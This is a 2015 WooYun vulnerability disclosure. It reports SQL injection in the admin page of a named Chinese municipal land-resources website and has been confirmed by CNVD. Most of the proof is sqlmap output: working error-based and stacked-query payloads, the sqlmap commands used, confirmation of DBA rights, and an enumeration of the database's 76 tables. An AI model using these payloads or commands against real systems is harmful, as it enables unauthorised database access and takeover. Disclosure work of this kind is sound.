当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123552

漏洞标题:某市国土资源存在SQL注入

相关厂商:cncert国家互联网应急中心

漏洞作者: elevensec11

提交时间:2015-07-03 16:34

修复时间:2015-08-21 09:54

公开时间:2015-08-21 09:54

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-03: 细节已通知厂商并且等待厂商处理中
2015-07-07: 厂商已经确认,细节仅向厂商公开
2015-07-17: 细节向核心白帽子及相关领域专家公开
2015-07-27: 细节向普通白帽子公开
2015-08-06: 细节向实习白帽子公开
2015-08-21: 细节向公众公开

简要描述:

咸阳市国土资源信息网存在SQL注入,导致信息发布可控

详细说明:

注入点:

http://www.xygtzyj.gov.cn/admin/ywjggs/zl_ywjggsMore.asp


DBA权限,奇葩的IIS5.0。

1.png


漏洞证明:

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutu
consent is illegal. It is the end user's responsibility to obey all applicabl
ocal, state and federal laws. Developers assume no liability and are not resp
ible for any misuse or damage caused by this program
*] starting at 15:55:57
15:55:57] [INFO] parsing HTTP request from 'oo.txt'
15:55:57] [INFO] testing connection to the target URL
qlmap identified the following injection points with a total of 0 HTTP(s) req
ts:
--
lace: POST
arameter: itemName
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING claus
Payload: chid=1&itemName=123%' AND 2824=CONVERT(INT,(SELECT CHAR(113)+CHAR
)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2824=2824) THEN CHAR(49) E
CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(115)+CHAR(110)+CHAR(113))) AND '%'='&
geField.x=32&imageField.y=7
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: chid=1&itemName=123%'; WAITFOR DELAY '0:0:5'--&imageField.x=32&im
Field.y=7
--
15:55:58] [INFO] testing Microsoft SQL Server
15:55:58] [INFO] confirming Microsoft SQL Server
15:56:04] [INFO] the back-end DBMS is Microsoft SQL Server
eb server operating system: Windows 2000
eb application technology: Microsoft IIS 5.0
ack-end DBMS: Microsoft SQL Server 2000
15:56:04] [INFO] testing if current user is DBA
urrent user is DBA: True
15:56:05] [WARNING] HTTP error codes detected during run:
00 (Internal Server Error) - 4 times
15:56:05] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap1
utput\www.xygtzyj.gov.cn'
*] shutting down at 15:56:05
:\Python27\sqlmap12>sqlmap.py -r oo.txt -p itemName --dbms "microsoft sql ser
" --current-db
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutu
consent is illegal. It is the end user's responsibility to obey all applicabl
ocal, state and federal laws. Developers assume no liability and are not resp
ible for any misuse or damage caused by this program
*] starting at 15:56:20
15:56:20] [INFO] parsing HTTP request from 'oo.txt'
15:56:20] [INFO] testing connection to the target URL
qlmap identified the following injection points with a total of 0 HTTP(s) req
ts:
--
lace: POST
arameter: itemName
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING claus
Payload: chid=1&itemName=123%' AND 2824=CONVERT(INT,(SELECT CHAR(113)+CHAR
)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2824=2824) THEN CHAR(49) E
CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(115)+CHAR(110)+CHAR(113))) AND '%'='&
geField.x=32&imageField.y=7
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: chid=1&itemName=123%'; WAITFOR DELAY '0:0:5'--&imageField.x=32&im
Field.y=7
--
15:56:21] [INFO] testing Microsoft SQL Server
15:56:21] [INFO] confirming Microsoft SQL Server
15:56:25] [INFO] the back-end DBMS is Microsoft SQL Server
eb server operating system: Windows 2000
eb application technology: Microsoft IIS 5.0
ack-end DBMS: Microsoft SQL Server 2000
15:56:25] [INFO] fetching current database
15:56:29] [INFO] retrieved: xygt
urrent database: 'xygt'
15:56:29] [WARNING] HTTP error codes detected during run:
00 (Internal Server Error) - 4 times
15:56:29] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap1
utput\www.xygtzyj.gov.cn'
*] shutting down at 15:56:29
:\Python27\sqlmap12>sqlmap.py -r oo.txt -p itemName --dbms "microsoft sql ser
" --tables -D xygt
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutu
consent is illegal. It is the end user's responsibility to obey all applicabl
ocal, state and federal laws. Developers assume no liability and are not resp
ible for any misuse or damage caused by this program
*] starting at 15:56:47
15:56:47] [INFO] parsing HTTP request from 'oo.txt'
15:56:47] [INFO] testing connection to the target URL
qlmap identified the following injection points with a total of 0 HTTP(s) req
ts:
--
lace: POST
arameter: itemName
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING claus
Payload: chid=1&itemName=123%' AND 2824=CONVERT(INT,(SELECT CHAR(113)+CHAR
)+CHAR(106)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2824=2824) THEN CHAR(49) E
CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(115)+CHAR(110)+CHAR(113))) AND '%'='&
geField.x=32&imageField.y=7
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: chid=1&itemName=123%'; WAITFOR DELAY '0:0:5'--&imageField.x=32&im
Field.y=7
--
15:56:48] [INFO] testing Microsoft SQL Server
15:56:48] [INFO] confirming Microsoft SQL Server
15:56:54] [INFO] the back-end DBMS is Microsoft SQL Server
eb server operating system: Windows 2000
eb application technology: Microsoft IIS 5.0
ack-end DBMS: Microsoft SQL Server 2000
15:56:54] [INFO] fetching tables for database: xygt
15:56:55] [INFO] the SQL query used returns 76 entries
15:56:56] [INFO] retrieved: dbo.a_accuse
15:56:57] [INFO] retrieved: dbo.a_accusetype
15:56:58] [INFO] retrieved: dbo.a_adv
15:57:00] [INFO] retrieved: dbo.a_channel
15:57:01] [INFO] retrieved: dbo.a_channeltype
15:57:02] [INFO] retrieved: dbo.a_color
15:57:03] [INFO] retrieved: dbo.a_dbsource
15:57:07] [INFO] retrieved: dbo.a_fileupload
15:57:09] [INFO] retrieved: dbo.a_funclass
15:57:10] [INFO] retrieved: dbo.a_funcreate
15:57:11] [INFO] retrieved: dbo.a_function
15:57:12] [INFO] retrieved: dbo.a_functiontype
15:57:13] [INFO] retrieved: dbo.a_geocode
15:57:14] [INFO] retrieved: dbo.a_inputhelp
15:57:15] [INFO] retrieved: dbo.a_inputtype
15:57:16] [INFO] retrieved: dbo.a_journal
15:57:17] [INFO] retrieved: dbo.a_journalchannel
15:57:22] [INFO] retrieved: dbo.a_keyword
15:57:23] [INFO] retrieved: dbo.a_keyword_type
15:57:27] [INFO] retrieved: dbo.a_lyb
15:57:28] [INFO] retrieved: dbo.a_mail
15:57:29] [INFO] retrieved: dbo.a_mailsend
15:57:30] [INFO] retrieved: dbo.a_mailsetup
15:57:31] [INFO] retrieved: dbo.a_mailtemp
15:57:32] [INFO] retrieved: dbo.a_member
15:57:33] [INFO] retrieved: dbo.a_menutree
15:57:37] [INFO] retrieved: dbo.a_news
15:57:38] [INFO] retrieved: dbo.a_pageclick
15:57:40] [INFO] retrieved: dbo.a_picture
15:57:41] [INFO] retrieved: dbo.a_Review
15:57:45] [INFO] retrieved: dbo.a_stat_Address
15:57:46] [INFO] retrieved: dbo.a_stat_Area
15:57:47] [INFO] retrieved: dbo.a_stat_Browser
15:57:48] [INFO] retrieved: dbo.a_stat_Day
15:57:49] [INFO] retrieved: dbo.a_stat_InfoList
15:57:51] [INFO] retrieved: dbo.a_stat_IpInfo
15:57:52] [INFO] retrieved: dbo.a_stat_IpInfo_old
15:57:56] [INFO] retrieved: dbo.a_stat_Ipone
15:57:57] [INFO] retrieved: dbo.a_stat_IpScope
15:57:59] [INFO] retrieved: dbo.a_stat_Iptwo
15:58:00] [INFO] retrieved: dbo.a_stat_log
15:58:04] [INFO] retrieved: dbo.a_stat_Month
15:58:05] [INFO] retrieved: dbo.a_stat_Mozilla
15:58:06] [INFO] retrieved: dbo.a_stat_online
15:58:10] [INFO] retrieved: dbo.a_stat_Refer
15:58:11] [INFO] retrieved: dbo.a_stat_Screen
15:58:13] [INFO] retrieved: dbo.a_stat_System
15:58:14] [INFO] retrieved: dbo.a_stat_Visit
15:58:15] [INFO] retrieved: dbo.a_stat_Visitor
15:58:16] [INFO] retrieved: dbo.a_stat_Weburl
15:58:17] [INFO] retrieved: dbo.a_stat_Week
15:58:18] [INFO] retrieved: dbo.a_stat_Year
15:58:21] [INFO] retrieved: dbo.a_sysconfig
15:58:22] [INFO] retrieved: dbo.a_template
15:58:23] [INFO] retrieved: dbo.a_temptag
15:58:24] [INFO] retrieved: dbo.a_temptype
15:58:25] [INFO] retrieved: dbo.a_url
15:58:26] [INFO] retrieved: dbo.a_user
15:58:27] [INFO] retrieved: dbo.a_usergroup
15:58:29] [INFO] retrieved: dbo.a_vote
15:58:30] [INFO] retrieved: dbo.dirs
15:58:31] [INFO] retrieved: dbo.dtproperties
15:58:33] [INFO] retrieved: dbo.n_ckqcr
15:58:35] [INFO] retrieved: dbo.n_ckqspjg
15:58:36] [INFO] retrieved: dbo.n_ckxkznjjg
15:58:37] [INFO] retrieved: dbo.n_gytdsyqcrht
15:58:41] [INFO] retrieved: dbo.n_jsxmydspjg
15:58:42] [INFO] retrieved: dbo.n_kyqzr
15:58:43] [INFO] retrieved: dbo.n_tdbgdcjg
15:58:44] [INFO] retrieved: dbo.n_tddjjg
15:58:48] [INFO] retrieved: dbo.n_tdzrdyjg
15:58:53] [INFO] retrieved: dbo.n_xmgp
15:58:54] [INFO] retrieved: dbo.n_xmgpuserinfo
15:58:56] [INFO] retrieved: dbo.n_zone
15:59:06] [INFO] retrieved: dbo.sysconstraints
15:59:08] [INFO] retrieved: dbo.syssegments
atabase: xygt
76 tables]
-------------------+
a_Review |
a_accuse |
a_accusetype |
a_adv |
a_channel |
a_channeltype |
a_color |
a_dbsource |
a_fileupload |
a_funclass |
a_funcreate |
a_function |
a_functiontype |
a_geocode |
a_inputhelp |
a_inputtype |
a_journal |
a_journalchannel |
a_keyword |
a_keyword_type |
a_lyb |
a_mail |
a_mailsend |
a_mailsetup |
a_mailtemp |
a_member |
a_menutree |
a_news |
a_pageclick |
a_picture |
a_stat_Address |
a_stat_Area |
a_stat_Browser |
a_stat_Day |
a_stat_InfoList |
a_stat_IpInfo |
a_stat_IpInfo_old |
a_stat_IpScope |
a_stat_Ipone |
a_stat_Iptwo |
a_stat_Month |
a_stat_Mozilla |
a_stat_Refer |
a_stat_Screen |
a_stat_System |
a_stat_Visit |
a_stat_Visitor |
a_stat_Weburl |
a_stat_Week |
a_stat_Year |
a_stat_log |
a_stat_online |
a_sysconfig |
a_template |
a_temptag |
a_temptype |
a_url |
a_user |
a_usergroup |
a_vote |
dirs |
dtproperties |
n_ckqcr |
n_ckqspjg |
n_ckxkznjjg |
n_gytdsyqcrht |
n_jsxmydspjg |
n_kyqzr |
n_tdbgdcjg |
n_tddjjg |
n_tdzrdyjg |
n_xmgp |
n_xmgpuserinfo |
n_zone |
sysconstraints |
syssegments |
-------------------+


2.png

修复方案:

过滤。

版权声明:转载请注明来源 elevensec11@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-07 09:53

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给陕西分中心,由陕西分中心后续协调网站管理单位处置。

最新状态:

暂无